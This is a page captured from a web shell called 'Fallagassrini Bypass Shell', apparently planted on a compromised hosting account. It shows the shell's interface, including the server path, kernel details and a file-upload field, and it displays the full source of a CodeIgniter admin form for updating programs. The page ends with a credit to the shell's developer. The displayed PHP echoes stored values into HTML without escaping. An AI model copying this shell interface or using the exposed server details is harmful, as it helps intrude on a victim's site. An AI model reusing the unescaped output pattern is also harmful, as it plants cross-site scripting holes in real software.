? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/unova.in/application/views/admin/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/unova.in/application/views/admin/update_programme.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<?php
$this->load->view('admin/header');
?>

    <body>
	<?php
            $this->load->view('admin/menu');
            $this->load->view('admin/jsfunctions');

        ?>

		<div class="container_12">



         <!-- Example table -->
               <!-- Form elements -->
            <div class="grid_12">

                <div class="module">
                     <h2><span>Update Upcoming Programs</span></h2>

                     <div class="module-body">
                         <form  id="validateform" class="formnew" action="<?=site_url();?>/admin/update_programme/" method="post">


                            <p>

                                <label>Program Title</label>
                                 <input type="hidden" name="id" value="<?php echo $programs->programme_id; ?>"  class="input-medium" />
                                <input type="text" name="programme_title" value="<?php echo $programs->programme_title; ?>" id="programme_title" class="input-medium" />

                            </p>
                             <p>

                                <label>Program Date</label>
                                <input type="text" name="prgmdate" id="prgmdate" value="<?php echo $programs->prgmdate; ?>" class="input-medium" />

                            </p>
                             <p>

                                <label>Program Info</label>
                                <input type="text" name="second_line" id="second_line" value="<?php echo $programs->second_line; ?>" class="input-medium" />

                            </p>
                             <p>

                                <label>Program venue</label>
                                <input type="text" name="third_line" id="third_line" value="<?php echo $programs->third_line; ?>" class="input-medium" />

                            </p>

                             <p>

                                <label>Program Description</label>
                                <textarea name="description" id="description" cols="" rows="9" class="input-medium" ><?php echo $programs->description; ?></textarea>

                            </p>
                              <p>

                                <label>Status</label>
                                <select name="active" id="active">
                                    <option <?php if($programs->active==1) { echo "selected"; }?> value="1">Active</option>
                                    <option <?php if($programs->active==2) { echo "selected"; }?> value="2">Inactive</option>
                                </select>

                            </p>
                             <p>

                                <label>sort</label>
                                 <input type="text" name="sort" id="sort" class="input-short required number" value="<?php echo $programs->order; ?>"  />
                                 <input type="hidden" name="actsort" id="actsort" class="input-short" value="<?php echo $programs->order; ?>"  />
                            </p>




                            <fieldset>
                                <input class="submit-green" type="submit" value="Submit" name="savep" onclick="addformdata('validateform')" />

                            </fieldset>
                        </form>
                     </div> <!-- End .module-body -->

                </div>  <!-- End .module -->
        		<div style="clear:both;"></div>
            </div> <!-- End .grid_12 -->

            <div style="clear:both;"></div>


            </div> <!-- End .container_12 -->


<?php
$this->load->view('admin/footer');
?>

	</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net